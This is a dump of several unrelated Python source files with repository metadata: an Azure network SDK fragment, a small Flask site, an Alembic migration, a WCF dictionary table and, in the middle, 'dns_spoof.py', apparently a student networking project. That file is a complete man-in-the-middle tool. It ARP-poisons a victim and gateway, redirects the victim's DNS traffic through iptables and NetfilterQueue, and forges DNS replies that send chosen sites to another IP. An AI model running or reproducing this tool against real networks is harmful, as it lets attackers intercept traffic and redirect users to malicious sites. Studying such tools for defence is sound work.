get_shared_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}/sharedkey'}
def list(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""The List VirtualNetworkGatewayConnections operation retrieves all the
virtual network gateways connections created.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of VirtualNetworkGatewayConnection
:rtype:
~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnectionPaged[~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnection]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.VirtualNetworkGatewayConnectionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections'}
def _reset_shared_key_initial(
self, resource_group_name, virtual_network_gateway_connection_name, key_length, custom_headers=None, raw=False, **operation_config):
parameters = models.ConnectionResetSharedKey(key_length=key_length)
# Construct URL
url = self.reset_shared_key.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ConnectionResetSharedKey')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectionResetSharedKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def reset_shared_key(
self, resource_group_name, virtual_network_gateway_connection_name, key_length, custom_headers=None, raw=False, polling=True, **operation_config):
"""The VirtualNetworkGatewayConnectionResetSharedKey operation resets the
virtual network gateway connection shared key for passed virtual
network gateway connection in the specified resource group through
Network resource provider.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The virtual network
gateway connection reset shared key Name.
:type virtual_network_gateway_connection_name: str
:param key_length: The virtual network connection reset shared key
length, should between 1 and 128.
:type key_length: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns
ConnectionResetSharedKey or
ClientRawResponse<ConnectionResetSharedKey> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_08_01.models.ConnectionResetSharedKey]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_08_01.models.ConnectionResetSharedKey]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._reset_shared_key_initial(
resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name,
key_length=key_length,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('ConnectionResetSharedKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
reset_shared_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}/sharedkey/reset'}
| 49.686822 | 203 | 0.696299 |
4a1b3de00bf36b7cd46bb49854d39be3a38125df
| 6,970 |
py
|
Python
|
src/dns_spoof.py
|
vsingh27/DNS_Spoofer
|
78a1251f0ed316ac70e55bccf2a81822b1000176
|
[
"MIT"
] | null | null | null |
src/dns_spoof.py
|
vsingh27/DNS_Spoofer
|
78a1251f0ed316ac70e55bccf2a81822b1000176
|
[
"MIT"
] | null | null | null |
src/dns_spoof.py
|
vsingh27/DNS_Spoofer
|
78a1251f0ed316ac70e55bccf2a81822b1000176
|
[
"MIT"
] | null | null | null |
# dns_spoof.py
#
# Design and Program: Vishav Singh & Manuel Gonzales
#
# functions:
#
# def signal_handler(signum, frame)
# def sniffer()
# def get_address(interface, ip)
# def start_mitm(interface, victim, gateway)
# def parse(packet)
# def redirectionRules(victim)
# def getWebIP(website)
# def main()
#
# Program to spoof a DNS response to a victim machine, the way it works is that initially
# the program ARP poisons the victim into believing this system to be the gateway, This is
# done in order to sniff traffic and manipulate the DNS responses the victim machines gets
# to redirect them to a different website.
#
import setproctitle
import optparse
import signal
from netfilterqueue import NetfilterQueue
from multiprocessing import Process
from scapy.all import *
from scapy.layers.inet import IP, UDP, Ether
# Constants
CONST_DESTINATION_PORT = 53
CONST_DNS_SERVER = "8.8.8.8"
# Global
mitm_running = False
spoof_running = True
process_name = "None"
websites = [] #websites array
new_website = "None"
# main function to parse the arguments and start the processes of MITM and to sniff traffic
def main():
parser = optparse.OptionParser()
parser.add_option("-i", "--interface", type="string", dest="interface",
help="[REQUIRED] Local Interface to Use")
parser.add_option("-d", "--destination_ip", type="string", dest="destination_ip",
help="[REQUIRED] IP address to Sniff")
parser.add_option("-r", "--router_ip", type="string", dest="router_ip",
help="[REQUIRED] IP address of the gateway/router")
parser.add_option("-w", "--website", type="string", dest="website",
help="[REQUIRED] Website(s) to Spoof (Separated by commas)")
parser.add_option("-n", "--new_website", type="string", dest="new_website",
help="[REQUIRED] Website to redirect to")
parser.add_option("-t", "--title", type="string", dest="title",
help="[REQUIRED] Process name")
(options, args) = parser.parse_args()
if len(sys.argv) < 2:
parser.error("Use -h or --help for instructions")
if not options.interface or not options.destination_ip or not options.router_ip or not options.new_website or not options.website or not options.title:
parser.error("Please fill in all the required parameters")
global process_name
global new_website
global websites
try:
signal.signal(signal.SIGINT, signal_handler)
setproctitle.setproctitle(options.title)
process_name = options.title
websites = options.website.split(",")
new_website = getWebIP(options.new_website)
conf.verb = 0
redirectionRules(options.destination_ip)
except Exception:
print "Couldn't set options"
return
p1 = Process(target=start_mitm, args=(options.interface, options.destination_ip, options.router_ip))
p1.start()
p2 = Process(target=sniffer)
p2.start()
p1.join()
p2.kill()
# Function to stop all the processes in a clean manner when SIGNINT(Ctl + C) is found.
# signum - type of signal caught
# frame - stack frame
def signal_handler(signum, frame):
global spoof_running
global process_name
print ("Process %s is Stopping..." % process_name)
spoof_running = False
time.sleep(1)
print ("Stopped %s" % process_name)
sys.exit(0)
# Function to start the netfilter queue which gets all of the traffic to port 53 from the victim machine
# it then sends the packet for parsing. On stop if clears the firewall rules
def sniffer():
global process_name
setproctitle.setproctitle("sniffer")
process_name = "sniffer"
filterQueue = NetfilterQueue()
filterQueue.bind(1, parse)
try:
filterQueue.run()
except KeyboardInterrupt:
filterQueue.unbind()
os.system('iptables -t nat -F')
os.system('iptables -t nat -X')
# Function to resolve the MAC address of a system in the network.
# interface - local interface in use
# ip - IP of system to resolve
def get_address(interface, ip):
ans = srp1(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=2, iface=interface, inter=0.1)
return ans[Ether].src
# Function to start ARP poisoning a victim system in order to be able to sniff all the traffic going
# to it, and also be able to tamper some of the traffic.
# interface - local interface in use
# victim - IP of the system to attack
# gateway - IP of the gateway/router
def start_mitm(interface, victim, gateway):
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
global spoof_running
global process_name
setproctitle.setproctitle("mitm")
process_name = "mitm"
try:
victim_address = get_address(interface, victim)
gateway_address = get_address(interface, gateway)
while spoof_running:
send(ARP(op=2, pdst=victim, psrc=gateway, hwdst=victim_address))
send(ARP(op=2, pdst=gateway, psrc=victim, hwdst=gateway_address))
time.sleep(0.5)
sys.exit(0)
except Exception:
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print "Couldn't start MITM"
return
# Function to parse the packets that get to the netfilter queue (trough the IP tables rule)
# It will check if the packet is a DNS request and if it is it will act accordingly if the
# request is for one of the websites to be spoofed.
# packet - packet received to the queue
def parse(packet):
global websites
global new_website
payload = packet.get_payload()
pkt = IP(payload)
if not pkt.haslayer(DNSQR):
packet.accept()
else:
for website in websites:
if website in pkt[DNS].qd.qname:
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=new_website))
spoofed_pkt.show()
packet.set_payload(str(spoofed_pkt))
packet.accept()
return
packet.accept()
# Function to redirect all the DNS traffic from the victim system into the nefilter queue
# victim - IP of victim system
def redirectionRules(victim):
os.system("iptables -t nat -A PREROUTING -p udp -s " + victim + " --dport " + str(CONST_DESTINATION_PORT) + " -j NFQUEUE --queue-num 1")
# Function to resolve the IP of a domain.
# website - domain name of website to redirect to
def getWebIP(website):
answer = sr1(IP(dst=CONST_DNS_SERVER)/UDP(dport=CONST_DESTINATION_PORT)/DNS(rd=1,qd=DNSQR(qname=website)),verbose=0)
data_number = answer.getlayer(DNS).ancount
if data_number == 0: #domain not found
return website
new_ip = answer.getlayer(DNS).an[data_number-1].rdata
return new_ip
# start script
main()
| 30.17316 | 155 | 0.673027 |
4a1b3e0ad8609509bca269fa79412623c27d5bd5
| 1,474 |
py
|
Python
|
main.py
|
ijcruic/IDS_final
|
37a88494bd2c28bd3f1364631da775b8057cc59c
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
ijcruic/IDS_final
|
37a88494bd2c28bd3f1364631da775b8057cc59c
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
ijcruic/IDS_final
|
37a88494bd2c28bd3f1364631da775b8057cc59c
|
[
"Apache-2.0"
] | null | null | null |
"""`main` is the top level module for your Flask application."""
# Data Exploration Byte Version 3
#
# Copyright 2/2018 John Stamper
#
# Licensed under GPL v3 (http://www.gnu.org/licenses/gpl.html)
#
# Imports
import os
import jinja2
import webapp2
import logging
import json
import urllib
# this is used for constructing URLs to google's APIS
from googleapiclient.discovery import build
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
# Import the Flask Framework
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def index():
template = JINJA_ENVIRONMENT.get_template('templates/index.html')
return template.render()
@app.route('/about')
def about():
template = JINJA_ENVIRONMENT.get_template('templates/about.html')
return template.render()
@app.route('/explore')
def explore():
template = JINJA_ENVIRONMENT.get_template('templates/explore.html')
return template.render()
@app.route('/attribute')
def attribute():
template = JINJA_ENVIRONMENT.get_template('templates/attribute.html')
return template.render()
@app.errorhandler(404)
def page_not_found(e):
"""Return a custom 404 error."""
return 'Sorry, Nothing at this URL.', 404
@app.errorhandler(500)
def application_error(e):
"""Return a custom 500 error."""
return 'Sorry, unexpected error: {}'.format(e), 500
| 24.983051 | 73 | 0.727273 |
4a1b3fa2c53ac0d80805d71f008fbd97e87725d7
| 135 |
py
|
Python
|
Util/main.py
|
Xiefan-Guo/Paper-PyTorch
|
5dbb68ba78f427b56e75ddbd95a68475951e1514
|
[
"MIT"
] | 2 |
2021-12-29T03:02:15.000Z
|
2021-12-29T06:31:18.000Z
|
Util/main.py
|
Xiefan-Guo/Paper-PyTorch
|
5dbb68ba78f427b56e75ddbd95a68475951e1514
|
[
"MIT"
] | null | null | null |
Util/main.py
|
Xiefan-Guo/Paper-PyTorch
|
5dbb68ba78f427b56e75ddbd95a68475951e1514
|
[
"MIT"
] | null | null | null |
import torch
w = torch.empty(3, 5)
torch.nn.init.constant_(w, 8)
x = torch.empty(3, 5)
torch.nn.init.constant_(x, 2)
print(w / x * 5)
| 16.875 | 29 | 0.659259 |
4a1b41652eff40c40785a96423a4bc47d9578808
| 581 |
py
|
Python
|
htp/aux/alembic/versions/4e9d98be262d_drop_get_id_column_from_signals_table.py
|
kirkjules/machine-learned-timeseries
|
7aedec0fe04807fef1cf5e79a929652101d467f7
|
[
"MIT"
] | 1 |
2020-05-17T21:49:57.000Z
|
2020-05-17T21:49:57.000Z
|
htp/aux/alembic/versions/4e9d98be262d_drop_get_id_column_from_signals_table.py
|
kirkjules/machine-learned-timeseries
|
7aedec0fe04807fef1cf5e79a929652101d467f7
|
[
"MIT"
] | 3 |
2020-08-15T01:11:45.000Z
|
2022-01-13T03:22:25.000Z
|
htp/aux/alembic/versions/4e9d98be262d_drop_get_id_column_from_signals_table.py
|
kirkjules/machine-learned-timeseries
|
7aedec0fe04807fef1cf5e79a929652101d467f7
|
[
"MIT"
] | null | null | null |
"""drop get id column from signals table
Revision ID: 4e9d98be262d
Revises: 936cfe97ee13
Create Date: 2020-01-30 06:25:13.817984
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects.postgresql import UUID
# revision identifiers, used by Alembic.
revision = '4e9d98be262d'
down_revision = '936cfe97ee13'
branch_labels = None
depends_on = None
def upgrade():
op.drop_column('signals', 'get_id')
def downgrade():
op.add_column('signals', sa.Column(
'get_id', UUID(as_uuid=True), sa.ForeignKey("getTickerTask.id"),
unique=False))
| 20.75 | 72 | 0.731497 |
4a1b4172b48f20def66dc65375ed79f27fde8129
| 126 |
py
|
Python
|
groupmenotifier/main.py
|
daconex/GroupMeNotifier
|
9e0ea6e46e171a65b188510d4a33bafc0a51d685
|
[
"MIT"
] | 1 |
2015-11-26T05:58:45.000Z
|
2015-11-26T05:58:45.000Z
|
groupmenotifier/main.py
|
daconex/GroupMeNotifier
|
9e0ea6e46e171a65b188510d4a33bafc0a51d685
|
[
"MIT"
] | null | null | null |
groupmenotifier/main.py
|
daconex/GroupMeNotifier
|
9e0ea6e46e171a65b188510d4a33bafc0a51d685
|
[
"MIT"
] | null | null | null |
from groupme import GroupMe
api = GroupMe()
api.handshake()
api.auth()
api.user_details()
api.user_subscribe()
api.connect()
| 14 | 27 | 0.753968 |
4a1b4352ce0d90ce02b3c1f4c712bebd0d08fc9d
| 20,487 |
py
|
Python
|
wcf/dictionary.py
|
ringsaturn/python-wcfbin
|
7e9af1efd94ab30d149e7152d700d313f7896fb3
|
[
"BSD-3-Clause"
] | 3 |
2020-03-29T13:28:41.000Z
|
2022-03-31T20:30:27.000Z
|
wcf/dictionary.py
|
ringsaturn/python-wcfbin
|
7e9af1efd94ab30d149e7152d700d313f7896fb3
|
[
"BSD-3-Clause"
] | 1 |
2020-03-30T05:12:17.000Z
|
2020-03-30T05:12:17.000Z
|
wcf/dictionary.py
|
caiyunapp/python-wcfbin
|
7e9af1efd94ab30d149e7152d700d313f7896fb3
|
[
"BSD-3-Clause"
] | null | null | null |
# vim: set ts=4 sw=4 tw=79 fileencoding=utf-8:
# Copyright (c) 2011, Timo Schmid <tschmid@ernw.de>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the ERMW GmbH nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
dictionary = {
0x00: "mustUnderstand",
0x02: "Envelope",
0x04: "http://www.w3.org/2003/05/soap-envelope",
0x06: "http://www.w3.org/2005/08/addressing",
0x08: "Header",
0x0A: "Action",
0x0C: "To",
0x0E: "Body",
0x10: "Algorithm",
0x12: "RelatesTo",
0x14: "http://www.w3.org/2005/08/addressing/anonymous",
0x16: "URI",
0x18: "Reference",
0x1A: "MessageID",
0x1C: "Id",
0x1E: "Identifier",
0x20: "http://schemas.xmlsoap.org/ws/2005/02/rm",
0x22: "Transforms",
0x24: "Transform",
0x26: "DigestMethod",
0x28: "DigestValue",
0x2A: "Address",
0x2C: "ReplyTo",
0x2E: "SequenceAcknowledgement",
0x30: "AcknowledgementRange",
0x32: "Upper",
0x34: "Lower",
0x36: "BufferRemaining",
0x38: "http://schemas.microsoft.com/ws/2006/05/rm",
0x3A: "http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement",
0x3C: "SecurityTokenReference",
0x3E: "Sequence",
0x40: "MessageNumber",
0x42: "http://www.w3.org/2000/09/xmldsig#",
0x44: "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
0x46: "KeyInfo",
0x48: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd",
0x4A: "http://www.w3.org/2001/04/xmlenc#",
0x4C: "http://schemas.xmlsoap.org/ws/2005/02/sc",
0x4E: "DerivedKeyToken",
0x50: "Nonce",
0x52: "Signature",
0x54: "SignedInfo",
0x56: "CanonicalizationMethod",
0x58: "SignatureMethod",
0x5A: "SignatureValue",
0x5C: "DataReference",
0x5E: "EncryptedData",
0x60: "EncryptionMethod",
0x62: "CipherData",
0x64: "CipherValue",
0x66: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd",
0x68: "Security",
0x6A: "Timestamp",
0x6C: "Created",
0x6E: "Expires",
0x70: "Length",
0x72: "ReferenceList",
0x74: "ValueType",
0x76: "Type",
0x78: "EncryptedHeader",
0x7A: "http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd",
0x7C: "RequestSecurityTokenResponseCollection",
0x7E: "http://schemas.xmlsoap.org/ws/2005/02/trust",
0x80: "http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret",
0x82: "http://schemas.microsoft.com/ws/2006/02/transactions",
0x84: "s",
0x86: "Fault",
0x88: "MustUnderstand",
0x8A: "role",
0x8C: "relay",
0x8E: "Code",
0x90: "Reason",
0x92: "Text",
0x94: "Node",
0x96: "Role",
0x98: "Detail",
0x9A: "Value",
0x9C: "Subcode",
0x9E: "NotUnderstood",
0xA0: "qname",
0xA2: "",
0xA4: "From",
0xA6: "FaultTo",
0xA8: "EndpointReference",
0xAA: "PortType",
0xAC: "ServiceName",
0xAE: "PortName",
0xB0: "ReferenceProperties",
0xB2: "RelationshipType",
0xB4: "Reply",
0xB6: "a",
0xB8: "http://schemas.xmlsoap.org/ws/2006/02/addressingidentity",
0xBA: "Identity",
0xBC: "Spn",
0xBE: "Upn",
0xC0: "Rsa",
0xC2: "Dns",
0xC4: "X509v3Certificate",
0xC6: "http://www.w3.org/2005/08/addressing/fault",
0xC8: "ReferenceParameters",
0xCA: "IsReferenceParameter",
0xCC: "http://www.w3.org/2005/08/addressing/reply",
0xCE: "http://www.w3.org/2005/08/addressing/none",
0xD0: "Metadata",
0xD2: "http://schemas.xmlsoap.org/ws/2004/08/addressing",
0xD4: "http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous",
0xD6: "http://schemas.xmlsoap.org/ws/2004/08/addressing/fault",
0xD8: "http://schemas.xmlsoap.org/ws/2004/06/addressingex",
0xDA: "RedirectTo",
0xDC: "Via",
0xDE: "http://www.w3.org/2001/10/xml-exc-c14n#",
0xE0: "PrefixList",
0xE2: "InclusiveNamespaces",
0xE4: "ec",
0xE6: "SecurityContextToken",
0xE8: "Generation",
0xEA: "Label",
0xEC: "Offset",
0xEE: "Properties",
0xF0: "Cookie",
0xF2: "wsc",
0xF4: "http://schemas.xmlsoap.org/ws/2004/04/sc",
0xF6: "http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk",
0xF8: "http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct",
0xFA: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT",
0xFC: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT",
0xFE: "RenewNeeded",
0x100: "BadContextToken",
0x102: "c",
0x104: "http://schemas.xmlsoap.org/ws/2005/02/sc/dk",
0x106: "http://schemas.xmlsoap.org/ws/2005/02/sc/sct",
0x108: "http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT",
0x10A: "http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT",
0x10C: "http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew",
0x10E: "http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew",
0x110: "http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel",
0x112: "http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel",
0x114: "http://www.w3.org/2001/04/xmlenc#aes128-cbc",
0x116: "http://www.w3.org/2001/04/xmlenc#kw-aes128",
0x118: "http://www.w3.org/2001/04/xmlenc#aes192-cbc",
0x11A: "http://www.w3.org/2001/04/xmlenc#kw-aes192",
0x11C: "http://www.w3.org/2001/04/xmlenc#aes256-cbc",
0x11E: "http://www.w3.org/2001/04/xmlenc#kw-aes256",
0x120: "http://www.w3.org/2001/04/xmlenc#des-cbc",
0x122: "http://www.w3.org/2000/09/xmldsig#dsa-sha1",
0x124: "http://www.w3.org/2001/10/xml-exc-c14n#WithComments",
0x126: "http://www.w3.org/2000/09/xmldsig#hmac-sha1",
0x128: "http://www.w3.org/2001/04/xmldsig-more#hmac-sha256",
0x12A: "http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1",
0x12C: "http://www.w3.org/2001/04/xmlenc#ripemd160",
0x12E: "http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p",
0x130: "http://www.w3.org/2000/09/xmldsig#rsa-sha1",
0x132: "http://www.w3.org/2001/04/xmldsig-more#rsa-sha256",
0x134: "http://www.w3.org/2001/04/xmlenc#rsa-1_5",
0x136: "http://www.w3.org/2000/09/xmldsig#sha1",
0x138: "http://www.w3.org/2001/04/xmlenc#sha256",
0x13A: "http://www.w3.org/2001/04/xmlenc#sha512",
0x13C: "http://www.w3.org/2001/04/xmlenc#tripledes-cbc",
0x13E: "http://www.w3.org/2001/04/xmlenc#kw-tripledes",
0x140: "http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap",
0x142: "http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap",
0x144: "http://schemas.microsoft.com/ws/2006/05/security",
0x146: "dnse",
0x148: "o",
0x14A: "Password",
0x14C: "PasswordText",
0x14E: "Username",
0x150: "UsernameToken",
0x152: "BinarySecurityToken",
0x154: "EncodingType",
0x156: "KeyIdentifier",
0x158: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary",
0x15A: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary",
0x15C: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text",
0x15E: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifier",
0x160: "http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ",
0x162: "http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510",
0x164: "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID",
0x166: "Assertion",
0x168: "urn:oasis:names:tc:SAML:1.0:assertion",
0x16A: "http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license",
0x16C: "FailedAuthentication",
0x16E: "InvalidSecurityToken",
0x170: "InvalidSecurity",
0x172: "k",
0x174: "SignatureConfirmation",
0x176: "TokenType",
0x178: "http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1",
0x17A: "http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey",
0x17C: "http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1",
0x17E: "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1",
0x180: "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0",
0x182: "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID",
0x184: "AUTH-HASH",
0x186: "RequestSecurityTokenResponse",
0x188: "KeySize",
0x18A: "RequestedTokenReference",
0x18C: "AppliesTo",
0x18E: "Authenticator",
0x190: "CombinedHash",
0x192: "BinaryExchange",
0x194: "Lifetime",
0x196: "RequestedSecurityToken",
0x198: "Entropy",
0x19A: "RequestedProofToken",
0x19C: "ComputedKey",
0x19E: "RequestSecurityToken",
0x1A0: "RequestType",
0x1A2: "Context",
0x1A4: "BinarySecret",
0x1A6: "http://schemas.xmlsoap.org/ws/2005/02/trust/spnego",
0x1A8: "http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego",
0x1AA: "wst",
0x1AC: "http://schemas.xmlsoap.org/ws/2004/04/trust",
0x1AE: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue",
0x1B0: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue",
0x1B2: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue",
0x1B4: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1",
0x1B6: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey",
0x1B8: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce",
0x1BA: "KeyType",
0x1BC: "http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey",
0x1BE: "http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey",
0x1C0: "Claims",
0x1C2: "InvalidRequest",
0x1C4: "RequestFailed",
0x1C6: "SignWith",
0x1C8: "EncryptWith",
0x1CA: "EncryptionAlgorithm",
0x1CC: "CanonicalizationAlgorithm",
0x1CE: "ComputedKeyAlgorithm",
0x1D0: "UseKey",
0x1D2: "http://schemas.microsoft.com/net/2004/07/secext/WS-SPNego",
0x1D4: "http://schemas.microsoft.com/net/2004/07/secext/TLSNego",
0x1D6: "t",
0x1D8: "http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue",
0x1DA: "http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue",
0x1DC: "http://schemas.xmlsoap.org/ws/2005/02/trust/Issue",
0x1DE: "http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey",
0x1E0: "http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1",
